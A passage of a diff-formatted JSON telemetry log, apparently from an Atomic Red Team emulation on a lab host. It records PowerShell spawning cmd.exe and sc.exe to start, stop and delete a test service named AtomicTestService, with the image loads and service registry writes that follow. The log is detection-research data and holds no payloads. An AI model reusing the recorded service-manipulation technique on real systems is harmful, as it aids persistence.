"{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5588, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5588, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5588, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5588, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5588, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845110000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}" + }, + { + "command_line": "sc.exe start AtomicTestService", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3448, + "ppid": 5588, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "subtype": "create", + "timestamp": 131883570845200000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}", + "unique_ppid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "sc.exe", + "image_path": "C:\\Windows\\System32\\sc.exe", + "pid": 3448, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845110000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3448, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845110000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3448, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845110000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3448, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845110000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3448, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845110000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3448, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845110000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 3448, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845110000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" + }, + { + "event_type": "process", + "pid": 3448, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "subtype": "terminate", + "timestamp": 131883570845270000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" + }, + { + "event_type": "process", + "pid": 5588, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570845270000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"sc.exe stop AtomicTestService\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 428, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570845380000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 428, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845270000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 428, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845270000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 428, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845270000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 428, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845270000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 428, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845270000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}" + }, + { + "command_line": "sc.exe stop AtomicTestService", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6352, + "ppid": 428, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "subtype": "create", + "timestamp": 131883570845480000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}", + "unique_ppid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "sc.exe", + "image_path": "C:\\Windows\\System32\\sc.exe", + "pid": 6352, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845430000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6352, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845430000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6352, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845430000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6352, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845430000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6352, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845430000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6352, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845430000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6352, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845430000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" + }, + { + "event_type": "process", + "pid": 6352, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "subtype": "terminate", + "timestamp": 131883570845430000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" + }, + { + "event_type": "process", + "pid": 428, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570845580000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"sc.exe delete AtomicTestService\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7720, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570845660000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7720, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845580000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7720, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845580000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7720, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845580000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7720, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845580000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7720, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845580000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}" + }, + { + "command_line": "sc.exe delete AtomicTestService", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2472, + "ppid": 7720, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "subtype": "create", + "timestamp": 131883570845760000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}", + "unique_ppid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "sc.exe", + "image_path": "C:\\Windows\\System32\\sc.exe", + "pid": 2472, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845740000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2472, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845740000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2472, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845740000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2472, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845740000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2472, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845740000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2472, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845740000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 2472, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570845740000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\DeleteFlag", + "registry_value": "DeleteFlag", + "timestamp": 131883570845740000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start", + "registry_value": "Start", + "timestamp": 131883570845740000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_value": "AtomicTestService", + "timestamp": 131883570845740000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "process", + "pid": 2472, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "subtype": "terminate", + "timestamp": 131883570845740000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" + }, + { + "event_type": "process", + "pid": 7720, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570845890000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3136, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570845950000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3136, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845890000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3136, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845890000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3136, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845890000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3136, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845890000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3136, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570845890000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}" + }, + { + "event_type": "process", + "pid": 3136, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570845890000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_value": "AtomicTestService", + "timestamp": 131883570846520000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Type", + "registry_value": "Type", + "timestamp": 131883570846520000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start", + "registry_value": "Start", + "timestamp": 131883570846520000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ErrorControl", + "registry_value": "ErrorControl", + "timestamp": 131883570846520000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ImagePath", + "registry_value": "ImagePath", + "timestamp": 131883570846520000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ObjectName", + "registry_value": "ObjectName", + "timestamp": 131883570846520000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570847300000, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570847300000, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": 